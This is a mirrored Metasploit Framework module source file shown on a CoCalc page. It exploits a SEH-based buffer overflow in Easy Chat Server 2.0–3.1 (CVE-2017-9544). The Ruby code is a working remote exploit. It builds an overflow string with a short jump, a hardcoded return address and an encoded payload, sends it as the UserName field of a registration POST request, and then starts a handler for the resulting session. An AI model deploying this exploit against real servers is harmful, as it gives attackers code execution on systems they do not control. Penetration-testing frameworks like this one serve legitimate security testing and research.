Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/easychatserver_seh.rb
23728 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
8
Rank = NormalRanking
9
10
include Msf::Exploit::Remote::HttpClient
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
17
'Description' => %q{
18
This module exploits a buffer overflow during user registration in Easy Chat Server software.
19
},
20
'Author' => [
21
'Marco Rivoli', # Metasploit
22
'Aitezaz Mohsin' # POC
23
],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'CVE', '2017-9544' ],
27
[ 'EDB', '42155' ],
28
],
29
'Privileged' => true,
30
'Payload' => {
31
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
32
},
33
'Platform' => 'win',
34
'Targets' => [
35
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
36
],
37
'DefaultOptions' => {
38
'RPORT' => 80,
39
'EXITFUNC' => 'thread',
40
'ENCODER' => 'x86/alpha_mixed'
41
},
42
'DisclosureDate' => '2017-10-09',
43
'DefaultTarget' => 0,
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
end
52
53
def exploit
54
sploit = rand_text_alpha_upper(217)
55
sploit << "\xeb\x06\x90\x90"
56
sploit << [target.ret].pack('V')
57
sploit << payload.encoded
58
sploit << rand_text_alpha_upper(200)
59
60
res = send_request_cgi({
61
'uri' => normalize_uri(URI, 'registresult.htm'),
62
'method' => 'POST',
63
'vars_post' => {
64
'UserName' => sploit,
65
'Password' => 'test',
66
'Password1' => 'test',
67
'Sex' => 1,
68
'Email' => 'x@',
69
'Icon' => 'x.gif',
70
'Resume' => 'xxxx',
71
'cw' => 1,
72
'RoomID' => 4,
73
'RepUserName' => 'admin',
74
'submit1' => 'Register'
75
}
76
})
77
handler
78
end
79
end
80
81